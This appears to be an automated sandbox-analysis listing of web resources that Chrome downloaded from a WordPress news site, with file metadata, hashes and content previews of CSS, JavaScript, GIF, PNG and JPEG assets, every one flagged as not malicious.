                                                        URL:https://storage.googleapis.com/stateless-mountainmedianews-co/sites/35/2025/03/dom-section-3-5-25-1-750x536.jpg
                                                        Preview:......JFIF.....`.`.....;CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), quality = 82....C.....................................!........'.."#%%%..),($+!$%$...C...........$...$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?....(...(..WV.2.kt.l.<.%.1..H.H.FR......L..G'..\..J.l....4!.v.y...rH<.1.*[...O.=._m...'.&6.!`1.t.Q.....]-.?.s0.b2..r......}.=>...@.../...1..$.m`H#..0@...-!.M Z.M.t.;..VP...( .xP..g..J..z..;..i.yE.i....+.2..c8.....K.....?.~..=.J...I0.Vd.s.W..X...........1.E,A#;V/.....a.;..<c.kcY......%e..KU.0. .V..m..
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:ASCII text, with very long lines (42577)
                                                        Category:downloaded
                                                        Size (bytes):604677
                                                        Entropy (8bit):5.168456262914587
                                                        Encrypted:false
                                                        SSDEEP:12288:dSehPxgECYFi7CG+i0pFBTsypUalDNaDYuyscMWzAAiVEvVLAxD9EdKjfNROKrqw:dSehiECYFOCG+i0pFBTsypUalDNaDYuD
                                                        MD5:7E3F3EBF379E2BB8A98E7DEC0C8A33A9
                                                        SHA1:9095DDF80CCC29B0FA84849A25E87B0FF46AEE71
                                                        SHA-256:0E1E887B68FE92B342A298BF095EF5C5A731B8939139313C458254176E296BE9
                                                        SHA-512:C767167DCAC26FEAC86D83F47BC0794A96C92922F7AFAD921A1C5172B92AACE1A07FA635658D0744B6EF98BB7B024CA8412BCEF7133B740E9B0EFA0397F8B4AB
                                                        Malicious:false
                                                        Reputation:low
                                                        URL:https://hardylive.com/wp-content/themes/jnews/assets/dist/frontend.min.css?ver=1.0.0
                                                        Preview:/*!. * Font Awesome 4.7.0 by @davegandy - http://fontawesome.io - @fontawesome. * License - http://fontawesome.io/license (Font: SIL OFL 1.1, CSS: MIT License). */@font-face{font-family:FontAwesome;src:url(font/fontawesome-webfont.eot);src:url(font/fontawesome-webfont.eot?#iefix&v=4.7.0) format("embedded-opentype"),url(font/fontawesome-webfont.woff2) format("woff2"),url(font/fontawesome-webfont.woff) format("woff"),url(font/fontawesome-webfont.ttf) format("truetype"),url(font/fontawesome-webfont.svg#fontawesomeregular) format("svg");font-weight:400;font-style:normal;font-display:swap}.fa{display:inline-block;font:normal normal normal 14px/1 FontAwesome;font-size:inherit;text-rendering:auto;-webkit-font-smoothing:antialiased;-moz-osx-font-smoothing:grayscale}.fa-lg{font-size:1.33333333em;line-height:.75em;vertical-align:-15%}.fa-2x{font-size:2em}.fa-3x{font-size:3em}.fa-4x{font-size:4em}.fa-5x{font-size:5em}.fa-fw{width:1.28571429em;text-align:center}.fa-ul{padding-left:0;margin-left:
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:ASCII text, with very long lines (59458)
                                                        Category:downloaded
                                                        Size (bytes):114706
                                                        Entropy (8bit):4.924852554644207
                                                        Encrypted:false
                                                        SSDEEP:3072:HaeJuf7Qg5MG7H+qehvP0x2pUk44Q03Pm:Qf7Qg5MG7H+qehvP0x2pUk4T0O
                                                        MD5:8C9F31823282E4E056EB0AA7FAC262A9
                                                        SHA1:DC3B1A37381E079FDA8DB59C1A9469852CD18B80
                                                        SHA-256:3BB38D0F302677FF4104564454F60F495133579D6E6DFB722B3DE850DF596502
                                                        SHA-512:39F239C875550BF9A31254EED1F0358EA3C6309D9FCBF6005D8852843EAF60BC20B8626D169F810A6C71B7DCDB769B8512314B89BA1FDEEA2CB3089BE9D21AE0
                                                        Malicious:false
                                                        Reputation:low
                                                        URL:https://hardylive.com/wp-includes/css/dist/block-library/style.min.css?ver=0b25e1
                                                        Preview:@charset "UTF-8";.wp-block-archives{box-sizing:border-box}.wp-block-archives-dropdown label{display:block}.wp-block-avatar{line-height:0}.wp-block-avatar,.wp-block-avatar img{box-sizing:border-box}.wp-block-avatar.aligncenter{text-align:center}.wp-block-audio{box-sizing:border-box}.wp-block-audio :where(figcaption){margin-bottom:1em;margin-top:.5em}.wp-block-audio audio{min-width:300px;width:100%}.wp-block-button__link{box-sizing:border-box;cursor:pointer;display:inline-block;text-align:center;word-break:break-word}.wp-block-button__link.aligncenter{text-align:center}.wp-block-button__link.alignright{text-align:right}:where(.wp-block-button__link){border-radius:9999px;box-shadow:none;padding:calc(.667em + 2px) calc(1.333em + 2px);text-decoration:none}.wp-block-button[style*=text-decoration] .wp-block-button__link{text-decoration:inherit}.wp-block-buttons>.wp-block-button.has-custom-width{max-width:none}.wp-block-buttons>.wp-block-button.has-custom-width .wp-block-button__link{width:100
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:GIF image data, version 89a, 1 x 1
                                                        Category:downloaded
                                                        Size (bytes):43
                                                        Entropy (8bit):2.9674235276304235
                                                        Encrypted:false
                                                        SSDEEP:3:CUPexltxlHh/:8b/
                                                        MD5:6F81C41597D3F5A336F458822CC0C32A
                                                        SHA1:8CD77A54B38F1FB376B45AF2EAAB8F5982523B8D
                                                        SHA-256:5704A2E9F2F7CE43A79F9B407F1AEDCFD50223CBE8BD2F71FF8C5C819E469CBC
                                                        SHA-512:EDB4841FA021F06B664C4F09378F6572177CEB8518B976C0B1571E2346FA116097D4979D31BD9AB7E841B68795922A07D451583620A2F31E3E54A867F91D7C95
                                                        Malicious:false
                                                        Reputation:low
                                                        URL:https://g.adspeed.net/ad.php?do=imp&aid=1125399&zid=117078&t=1741716181&auth=108567e63140a07de4bc55b82a10706c&oid=27064&wd=-1&ht=-1&ref=https%3A%2F%2Fhardylive.com%2F&uri=https%3A%2F%2Fhardylive.com%2Fcategory%2Feprint%2F
                                                        Preview:GIF89a.............!.......,...........D..;
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:GIF image data, version 89a, 100 x 75
                                                        Category:downloaded
                                                        Size (bytes):4399
                                                        Entropy (8bit):7.837306010522945
                                                        Encrypted:false
                                                        SSDEEP:96:pRdFes/VLSUNiDtox2dcRAhcRAjDtox28Y9QXa3X:DPP/gUxK7h7+xhXsX
                                                        MD5:C225D4001DC31C7FF8E290129F436175
                                                        SHA1:B27A1DCBF1ACCDEE9B64DB482E72AC3972363915
                                                        SHA-256:E2E60E9EAE839D6B2E857C708F6D02AE6069141594B941A1590CD5C5435D42F4
                                                        SHA-512:35BBD26A526ED0613FDA98415BBD0BAE1D7E3D76D74C3F85697BA7B371D08EC3ECC0D28D80FB2EEE88413DD051B52AD227617C1D78DCB0E877E4354705332E59
                                                        Malicious:false
                                                        Reputation:low
                                                        URL:https://hardylive.com/wp-content/themes/jnews/assets/dist/image/preloader.gif
                                                        Preview:GIF89ad.K....................................................!..NETSCAPE2.0.....!.......,....d.K...l..I..8....'.di.h..l.p,.tm.x..|....pH,...r.l:..tJ.Z..v..z..xL....z.n...|N.....~..................!s...!.......,......K...~...R,.I/V.AYW&L.....2[....qE...z....a.?...@2..f1.UU.....&.Kj.....g.sl._..v.-_..v7.....ub.}..z....s.....y..........he!..F...!.......,......K......D.... .9..(.cJX.m...d...Ei....9..\..0..3..{.Z"y...0(.f....R.i.%..... S.9.(F..q..h...:{l?e].rk%}.ya..w..z.Q.~...5......C.t.S.....7..........|....................................................................'...|...2.pa.z...cFo"7...A.nc1..A...hq..$.Q<.]."Qv|.Pa.7m...3f.*/...'N.:..U..$OlKp.1.D..,1"..!.......,....(.K........B(.3..E".....0l.fQ.RY..._h.(0..@.".Q..['g".z*....]2.%.Y.A.-..jM.~..{J..S#.).t<.....D.bTs45.~j]](~+p.r1HI..\{.}...rD.Ji.lnR....Lz$..Aq.... :...`...Yx..^....W...{.}...K.k...G......c.............a.....Q............^7.........k..-...!....1.f._...(.......=....Fw.Vb..RdC.
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:ASCII text, with very long lines (4741)
                                                        Category:downloaded
                                                        Size (bytes):4776
                                                        Entropy (8bit):5.153085086858448
                                                        Encrypted:false
                                                        SSDEEP:96:vmK40IdSs6c7DE/3sc/YrEBnUBPwKxbqe/Ds91sBYt1Em4kCofWQRemN:OK40IdS/cHg3NZBnUJbqe/DeGYtu7kC6
                                                        MD5:C6FDDBB6BE69793478DE26FC245B2ACF
                                                        SHA1:A136EBF5054FDC19729B3592005FE0FEFEC4BB4C
                                                        SHA-256:9A1E0D38B691F1D22A92CFF65EC0439B428170AC39A4493C7ECB06D5585F56A3
                                                        SHA-512:8A766304CAA9C888CFCAB64EABAB906905965E7FBCFC4F79C74AB122B892456ABAD215D0883DF17023A16A18BA15A6A4B3D0FA5345CAB7173D778F725B827C33
                                                        Malicious:false
                                                        Reputation:low
                                                        URL:https://hardylive.com/wp-includes/js/dist/hooks.min.js?ver=4d63a3d491d11ffd8ac6
                                                        Preview:/*! This file is auto-generated */.(()=>{"use strict";var t={d:(e,n)=>{for(var r in n)t.o(n,r)&&!t.o(e,r)&&Object.defineProperty(e,r,{enumerable:!0,get:n[r]})},o:(t,e)=>Object.prototype.hasOwnProperty.call(t,e),r:t=>{"undefined"!=typeof Symbol&&Symbol.toStringTag&&Object.defineProperty(t,Symbol.toStringTag,{value:"Module"}),Object.defineProperty(t,"__esModule",{value:!0})}},e={};t.r(e),t.d(e,{actions:()=>P,addAction:()=>A,addFilter:()=>m,applyFilters:()=>w,applyFiltersAsync:()=>I,createHooks:()=>h,currentAction:()=>x,currentFilter:()=>T,defaultHooks:()=>f,didAction:()=>j,didFilter:()=>z,doAction:()=>g,doActionAsync:()=>k,doingAction:()=>O,doingFilter:()=>S,filters:()=>Z,hasAction:()=>_,hasFilter:()=>v,removeAction:()=>p,removeAllActions:()=>F,removeAllFilters:()=>b,removeFilter:()=>y});const n=function(t){return"string"!=typeof t||""===t?(console.error("The namespace must be a non-empty string."),!1):!!/^[a-zA-Z][a-zA-Z0-9_.\-\/]*$/.test(t)||(console.error("The namespace can only conta
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:PNG image data, 300 x 120, 8-bit/color RGB, non-interlaced
                                                        Category:downloaded
                                                        Size (bytes):77683
                                                        Entropy (8bit):7.2836921082644075
                                                        Encrypted:false
                                                        SSDEEP:1536:6N6wf/vcD8MrzW42tn9fNPsXf26rCs4c1nS:I6Enc4Mrzk3Pse6v4cY
                                                        MD5:9299953E10CD0874C764D100C8A1F50F
                                                        SHA1:92EAA14F3514DDC8F5F7D1741E592522EB71B809
                                                        SHA-256:27B05CB3D97B1B5E123AF20B7786C95255CDE7D9B471BE1104A263D317C881A9
                                                        SHA-512:34A23B9430430577E9374E4A2FBE20074ACE990E976FF8DBA8AE7C108A413403B33FE1492BA5735EB5291C63AAF0EFD789759ABE03FFFEB286235F74ADD36B45
                                                        Malicious:false
                                                        Reputation:low
                                                        URL:https://storage.googleapis.com/stateless-mountainmedianews-co/sites/35/2022/08/Country-Cars-and-Truck.png
                                                        Preview:.PNG........IHDR...,...x......wXw....pHYs...#...#.x.?v....iCCPPhotoshop ICC profile..x..]l.U....93k..U.-I...!.Y.(........n.-..D...c...........P.......D..D.Bn0....1.p..'$$.(........7.............I.f.P..Yk....B..XA7+*v.gJ."@..].]...#........Z1-...........A.O..!..l?..!..@..?1.....Z..@.T...t.....N..].LC.$.;..k.8.......rl.\.Z%.:........f...Z`e03......+..@.$N..(..$..9..[.]?....\..... 9XU..#...7...w...^.VA.[ojx.U{...&.u..[.CE..4....Zm.j.G"].:-sy...7g.{....y07._.<\..n.._..)...&.B9.....R......HK.d..]....`.+.P..j..{...i]..[.U.-.....j..|....S/Io.../QA.`.....,...b.hP.....C.....L!..A.0..%@RB.Z.......(.l.z>..E.?.........O...OC..i.M...Q.;.v.%...]"'._.h.b.Y...y.&..2..r........ X........%.p.f.+....[qGG..~M.._..W..N...>...W.....;..tV.....Y$..26..8.#_=..$N.xq.#U.xw../..)_..=......).g.R...G..w........y,.vV.F.N.D.2vV......-..Z.Ys....3.O.......b......}nq..{...m....b7 .038.U.x8.@.....q.V...[..}.{..!...y#gd..MF....cd:...#g.....=..^fR..!.@.?..Z=.....
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:ASCII text
                                                        Category:downloaded
                                                        Size (bytes):1750
                                                        Entropy (8bit):5.201356079325726
                                                        Encrypted:false
                                                        SSDEEP:24:TraEZ0+HW04HFrLRONl/ZvTyfTrcshhpgoKptW5QCrVhnislJglxhUlvzl+MIL:iALh0FrLRONlxvTWrcshhqoK6JdQ
                                                        MD5:25720A0904006E584A53997C64B55031
                                                        SHA1:521D19073F7E1EE9268A8C7F336F4DC38F531E1C
                                                        SHA-256:4BFC9785932A7820C7239C0500F027930E5ED959100A24393D6B2505425E316A
                                                        SHA-512:D7F6D08D7B59E0E52DAD9C724250543176165017F9899007EAB25C7FD950078D29EC818E2F2FA0291ADF6941B6F8DE418C2E3AD0C557BE39B7002432712A8479
                                                        Malicious:false
                                                        Reputation:low
                                                        URL:https://hardylive.com/wp-content/plugins/metorik-helper/assets/css/metorik.css?ver=2.0.9
                                                        Preview:/* Base styles for add to cart */..metorik-add-cart-email-form {..max-width: 300px;..padding: 18px 15px 20px;..text-align: left;.}...metorik-add-cart-email-form h3 {..font-weight: 600;..margin: 0 0 20px;.}...metorik-add-cart-email-form .close-button {..color: #bbb;..cursor: pointer;..font-size: 15px;..position: absolute;..right: 28px;..top: 28px;.}...metorik-add-cart-email-form .close-button:hover {..color: #888;.}...metorik-add-cart-email-form .email-input-wrapper {..position: relative;.}...metorik-add-cart-email-form .email-input-wrapper.loading {..opacity: 0.75;.}...metorik-add-cart-email-form .email-input-wrapper.success:after {..color: rgb(55, 178, 77);..content: "\2713";..font-size: 17px;..position: absolute;..right: 10px;..top: 10px;.}...metorik-add-cart-email-form .email-input {..width: calc(100% - 20px);..padding: 5px;.}...metorik-add-cart-email-form .email-usage-notice {..padding: 5px 0 0;.}../* tippy light theme */..tippy-box[data-theme~='light'] {..color: #26323d;..box-shad
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:ASCII text, with very long lines (2279), with no line terminators
                                                        Category:downloaded
                                                        Size (bytes):2279
                                                        Entropy (8bit):4.889733367965599
                                                        Encrypted:false
                                                        SSDEEP:24:Lc4i4zzLoO4iUlPtOU3NiOoBSivdSiEiIDiGisPKn1VrH05npRMZ8RsAWJ6y6/BC:LTBHLoFiSAYQDTZrlJLOIKo/5fl
                                                        MD5:48D56016B20F151BE4F24BA6D0EB1BE4
                                                        SHA1:D46D600E709E67E5F41A91C2EDCD038A2677A495
                                                        SHA-256:00FAAB274A47C51CF6C4AD12D5398AC8A6F04C096F056AD26B90D987E628F0F6
                                                        SHA-512:47C65FF097B728CB4DE6F695226ABB7CEAF587ABBD8487E5986D4A5FE4BD2FF31BDE10F563C193923F4AF80BBCB0E5297263733C7123427EE6D8CD62E95CA0D8
                                                        Malicious:false
                                                        Reputation:low
                                                        URL:https://hardylive.com/wp-content/plugins/woocommerce/assets/css/brands.css?ver=aab4a5
                                                        Preview:.tax-product_brand .brand-description{overflow:hidden;zoom:1}.tax-product_brand .brand-description img.brand-thumbnail{width:25%;float:right}.tax-product_brand .brand-description .text{width:72%;float:left}.widget_brand_description img{box-sizing:border-box;width:100%;max-width:none;height:auto;margin:0 0 1em}ul.brand-thumbnails{margin-left:0;margin-bottom:0;clear:both;list-style:none}ul.brand-thumbnails:before{clear:both;content:"";display:table}ul.brand-thumbnails:after{clear:both;content:"";display:table}ul.brand-thumbnails li{float:left;margin:0 3.8% 1em 0;padding:0;position:relative;width:22.05%}ul.brand-thumbnails.fluid-columns li{width:auto}ul.brand-thumbnails:not(.fluid-columns) li.first{clear:both}ul.brand-thumbnails:not(.fluid-columns) li.last{margin-right:0}ul.brand-thumbnails.columns-1 li{width:100%;margin-right:0}ul.brand-thumbnails.columns-2 li{width:48%}ul.brand-thumbnails.columns-3 li{width:30.75%}ul.brand-thumbnails.columns-5 li{width:16.95%}ul.brand-thumbnails.columns
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:ASCII text, with very long lines (7581), with no line terminators
                                                        Category:downloaded
                                                        Size (bytes):7581
                                                        Entropy (8bit):5.124911684324639
                                                        Encrypted:false
                                                        SSDEEP:192:q5nV2DkJPTYWxr0qUi2coMoPo2oS2oSaxRoxoSp1ro/okogHo6RLK5:ksg6Nc3kJo8xRY1rozHLxw
                                                        MD5:BE37BE2FA8D07D31530EF0BDCC676F1B
                                                        SHA1:9834AE3C8FA1FD3676B5E4839ECE78D41160BF47
                                                        SHA-256:98FF2F173784B131E58F376088DFD9F53AEDFCBC9FEB5A65D5F90D671F9B8E4F
                                                        SHA-512:E337B92FD530AEDB7CDAFFDA4AB8AD653709C66DEF62B37820BEEA7C61A14BBCA73C9B0880A28FC453C2D10E5B15EB981F6581AB98BBFBFC4B6F903795FF918A
                                                        Malicious:false
                                                        Reputation:low
                                                        URL:https://hardylive.com/wp-content/plugins/advanced-ads/public/assets/js/advanced.min.js?ver=1.52.3
                                                        Preview:!function(){function e(t){return e="function"==typeof Symbol&&"symbol"==typeof Symbol.iterator?function(e){return typeof e}:function(e){return e&&"function"==typeof Symbol&&e.constructor===Symbol&&e!==Symbol.prototype?"symbol":typeof e},e(t)}!function(){if("function"!=typeof window.CustomEvent){window.CustomEvent=function(e,t){t=t||{bubbles:!1,cancelable:!1,detail:null};var o=document.createEvent("CustomEvent");return o.initCustomEvent(e,t.bubbles,t.cancelable,t.detail),o}}function t(){var t,o=this.parentNode,a=arguments.length;if(o)for(a||o.removeChild(this);a--;)"object"!==e(t=arguments[a])?t=this.ownerDocument.createTextNode(t):t.parentNode&&t.parentNode.removeChild(t),a?o.insertBefore(t,this.nextSibling):o.replaceChild(t,this)}Element.prototype.replaceWith||(Element.prototype.replaceWith=t),CharacterData.prototype.replaceWith||(CharacterData.prototype.replaceWith=t),DocumentType.prototype.replaceWith||(DocumentType.prototype.replaceWith=t),window.NodeList&&!NodeList.prototype.forEa
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:JPEG image data, Exif standard: [TIFF image data, big-endian, direntries=12, height=2400, bps=0, PhotometricIntepretation=RGB, orientation=upper-left, width=2400], progressive, precision 8, 300x133, components 3
                                                        Category:downloaded
                                                        Size (bytes):39096
                                                        Entropy (8bit):7.6288872003668855
                                                        Encrypted:false
                                                        SSDEEP:768:RA7pVbH/YyL1lbsM+yAlv+zetFpURfAjogn:R0VbH/tBt+SzqF8fAj5n
                                                        MD5:7B1B4AA551164A58848508979BAFC05D
                                                        SHA1:E0F49B0180A232609102E5676335206DE2DF486B
                                                        SHA-256:A770388E682A83B2115776D7451A916FBC2EFD9168C5063268E608C4B9AEA376
                                                        SHA-512:3C7105F92B8532CD689AA3F5EC8842306B9BF8AC40C5E22796153DFE5C5615DC29191CDBB89FD6489B7EC3B7711A8A75C86B9D5B780B1A6EB624D4132896B059
                                                        Malicious:false
                                                        Reputation:low
                                                        URL:https://storage.googleapis.com/stateless-mountainmedianews-co/sites/35/2024/09/HardyLive2019-Logo.jpg
                                                        Preview:......Exif..MM.*...............`...........`...........................................................................(...........1.....$.....2..........i.............$.......-....'..-....'.Adobe Photoshop CC 2019 (Macintosh).2019:09:30 21:44:43...........0231.......................,...........................................r...........z.(.........................................H.......H..........Adobe_CM......Adobe.d................................................................................................................................................. .H.."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?...;z...t....s.|.v..k...?#w.aq.i._;#.........C....;%..v{Y...}?...^.....
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:ASCII text, with very long lines (47490), with no line terminators
                                                        Category:downloaded
                                                        Size (bytes):47490
                                                        Entropy (8bit):4.770437067926691
                                                        Encrypted:false
                                                        SSDEEP:384:ecp6XmMLKbaV3EyobFJhBLbiJHvOt2ALHP32owwAPbQbKP+6qryZta:ecwXmL3hBLOdvOt2E2owwAPbQbK0yTa
                                                        MD5:0F06624704247D783F8270C9CC116EF1
                                                        SHA1:ADE2893534C4435D05E8334762791DC1E37BE1A2
                                                        SHA-256:83D36DFD09B5F1FDF95C7AC47E7DF5586A2448AA4B4F97B40894B783F4846717
                                                        SHA-512:A5476C824AB85F5A5B0B5746133F49C731DE50AE968D9F0A1F21B92C86A855C6045285FF23D8D8F7CECEC77C9CD3B5D14F572201BC3D6A6DC3CDC7B490A75839
                                                        Malicious:false
                                                        Reputation:low
                                                        URL:https://hardylive.com/wp-content/themes/jnews/assets/css/darkmode.css?ver=1.0.0
                                                        Preview:.jnews-dark-mode{--j-grey-bg-color:#494949;--j-darkgrey-bg-color:#282828;--j-bg-color:#1A1A1A;--j-dark-bg-color:#131313;--j-txt-color:#CACACA;--j-link-txt-color:#ffffff;--j-meta-txt-color:#8B8B8B;--j-border-color:#303030;color:var(--j-txt-color);background-color:var(--j-bg-color)}.jnews-dark-mode.jeg_boxed{background-color:#000}.jnews-dark-mode #buddypress #header-cover-image,.jnews-dark-mode #buddypress table.forum tr.alt td,.jnews-dark-mode #buddypress table.messages-notices tr.alt td,.jnews-dark-mode #buddypress table.notifications tr.alt td,.jnews-dark-mode #buddypress table.notifications-settings tr.alt td,.jnews-dark-mode #buddypress table.profile-fields tr.alt td,.jnews-dark-mode #buddypress table.profile-settings tr.alt td,.jnews-dark-mode #buddypress table.wp-profile-fields tr.alt td,.jnews-dark-mode #header-cover-image,.jnews-dark-mode .buddypress-wrap .bp-tables-user tr.alt td,.jnews-dark-mode .buddypress-wrap table.wp-profile-fields tr.alt td,.jnews-dark-mode .footer_dark,.
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:ASCII text
                                                        Category:downloaded
                                                        Size (bytes):27851
                                                        Entropy (8bit):5.017360222535392
                                                        Encrypted:false
                                                        SSDEEP:768:uREepgnqo2jPQ13xPFsVJopfh8vOFu/wFJFsblns:ReOp58moYTp
                                                        MD5:9CF2A06BF7015A9CE5840157F77B9680
                                                        SHA1:CCF174BFCDB417DCC739AF0EC0175D8E3733400E
                                                        SHA-256:66E5CC93CB1015912C50B136DB714AD77714E94CF37506C36E1A4C92EFB5422E
                                                        SHA-512:04B9F3BA47CFD77473829D4F59C70380D3B4D8CF4AE7C6B67CB6DF90CD590724E2833E93D80708013A1513DD218CDEB492B8A0FC14CE2C430B5204B2F336C3F6
                                                        Malicious:false
                                                        Reputation:low
                                                        URL:https://hardylive.com/wp-content/plugins/ajax-login-and-registration-modal-popup/assets/lrm-core-compiled.css?ver=56
                                                        Preview:/*! ====================================. Public styles for LRM. Compiled from SCSS.====================================*/./* modal.scss */..lrm-user-modal {. position: fixed;. top: 0;. left: 0;. width: 100%;. height: 100%;. background: rgba(52, 54, 66, 0.9);. z-index: 999999;. overflow-y: auto;. cursor: pointer;. visibility: hidden;. opacity: 0;. -webkit-transition: opacity 0.3s, visibility 0.3s;. -moz-transition: opacity 0.3s, visibility 0.3s;. transition: opacity 0.3s, visibility 0.3s;.}..lrm-user-modal.is-visible {. visibility: visible !important;. opacity: 1;.}..lrm-user-modal.is-visible .lrm-user-modal-container {. -webkit-transform: translateY(0);. -moz-transform: translateY(0);. -ms-transform: translateY(0);. -o-transform: translateY(0);. transform: translateY(0);.}..ul.lrm-switcher {. list-style: none !important;. list-style-type: none !important;. padding: 0 !important;. margin: 0 !important;.}...lrm-user-modal-container-inner {. background: #F
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, comment: "CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), quality = 82", baseline, precision 8, 1451x2560, components 3
                                                        Category:dropped
                                                        Size (bytes):954032
                                                        Entropy (8bit):7.958675148014824
                                                        Encrypted:false
                                                        SSDEEP:24576:aAtE30UgcnXZ9iAyXMNtFH3ArU4FuVmxXXmRmCtd:9E3FJBbtFQvFkmVXmjv
                                                        MD5:864F99E7963D3A5FFB106B3B01B7D50D
                                                        SHA1:F5589C51DB923EDDD97003DE961B0416E470640A
                                                        SHA-256:9600C1FB83EA5686646866C115725B643C7C041CDCD9D408A2858AEDE8509304
                                                        SHA-512:E9099677D79B9E59B047E44BCD0E023D057E73A27EE282453EFEF8B6A4B1DE4C62A7E8FB3267C4296AF6A10E8EB6DDB81D39B4A485AC631FB72D9E89E8096E6D
                                                        Malicious:false
                                                        Reputation:low
                                                        Preview:......JFIF.....`.`.....;CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), quality = 82....C.....................................!........'.."#%%%..),($+!$%$...C...........$...$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?....(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:ASCII text, with no line terminators
                                                        Category:downloaded
                                                        Size (bytes):176
                                                        Entropy (8bit):5.1800589198511195
                                                        Encrypted:false
                                                        SSDEEP:3:GMyoSb/TNkKTSSrkD/dkw2OMVEkz1GKW8nTNzNxOkLiikgpk50CnmBQigmH101n:jFSbhkNSwL3Bdk4V2TNzNIOkgpkhaQi8
                                                        MD5:DFEF2561578BA1D24F309D33033DB90B
                                                        SHA1:4741E56DE6E955FEBDFDA16273710E6948B28217
                                                        SHA-256:E89F5B45B48FEC053151BB4B2E00F5AF5D7E386D7F5838D2DDCE4141426B082B
                                                        SHA-512:DE0A9E6B796905A4E89D489E07A8C250E75FEA5E2DA9D5BA8B537444D6C6E32E6E91BBC760C6174BE3DBCC964D9A3D420D53884BD2A7545A1BBEA5F3E96D5BE7
                                                        Malicious:false
                                                        Reputation:low
                                                        URL:https://content-autofill.googleapis.com/v1/pages/ChRDaHJvbWUvMTM0LjAuNjk5OC4zNhIgCSkh_hcgc_JCEgUN541ADhIFDc5BTHohtibLDFs8DNwSNQnFDehkJlOPBxIFDeeNQA4SBQ0oSy2JEgUNWQwaCBIFDbyJ6tASBQ2DqFs9Ia2kCouJqlj6EhkJdMQpzwi24r0SBQ2GeWyHIc3wYYbMdOhuEhkJNHs1Fb16QqUSBQ27V1ZqIc3wYYbMdOhuEicJqxHPQ4TWTFYSBQ164U_gEgUNnE5K0BIFDYOoWz0hEq3aJXWZ1ss=?alt=proto
                                                        Preview:ChIKBw3njUAOGgAKBw3OQUx6GgAKLQoHDeeNQA4aAAoHDShLLYkaAAoHDVkMGggaAAoHDbyJ6tAaAAoHDYOoWz0aAAoJCgcNhnlshxoACgkKBw27V1ZqGgAKJwoLDXrhT+AaBAgDGAEKCw2cTkrQGgQIBRgBCgsNg6hbPRoECAkYAQ==
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:GIF image data, version 87a, 1 x 1
                                                        Category:downloaded
                                                        Size (bytes):35
                                                        Entropy (8bit):3.066054462414549
                                                        Encrypted:false
                                                        SSDEEP:3:M3SLlHh/:f/
                                                        MD5:729C3007A8ED0597531B0C76D54A94BB
                                                        SHA1:90FE9B8A8142548FDFAB29F59CB0A164A0EAEF81
                                                        SHA-256:6A842EA462DACA2A0B5A0F5F25BCFC8E0059AC811CA6C6A1BC54E4D9119621C3
                                                        SHA-512:AC44DA7F455BFAE52B883639964276026FB259320902AA813D0333E021C356A7B3E3537B297F9A2158E588C302987CE0854866C039D1BB0FFB27F67560739DB2
                                                        Malicious:false
                                                        Reputation:low
                                                        URL:https://virtual.urban-orthodontics.com/KAKxe1Mg0hJMIItJHjGdWVt21AsKOJMXSWzVEkZl7ghcY8UICi6TCFwgi0kEIMNZEiDZEUdh2Q5ZZMcUUHvIAUEgzA==
                                                        Preview:GIF87a........jl...,...........D..;
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:ASCII text
                                                        Category:downloaded
                                                        Size (bytes):427
                                                        Entropy (8bit):4.963012265028744
                                                        Encrypted:false
                                                        SSDEEP:12:UhnzTKLSwPRRhZX08goGAVDjj+BRECqrD9lRS5kjAwv:E3KO2B/djjQRjiVS5k8wv
                                                        MD5:93516359DFDDA37FD61BB159BE008C65
                                                        SHA1:4529B46CE12807187B5C67A15917BBF110CB12B8
                                                        SHA-256:7055E7C4FB4A3D58708E62251D45A4FEE1A9FF34D14FEF28277875AE17D9DBE8
                                                        SHA-512:97C5BF17B6CBBD76B02F1EEDC591FF14DD51E7E2AB49FBE6DA97418E077079244D784E1FD0F27B605C8B3363CA0B81E9250405BD5A57F3725B2B5C93CA27658E
                                                        Malicious:false
                                                        Reputation:low
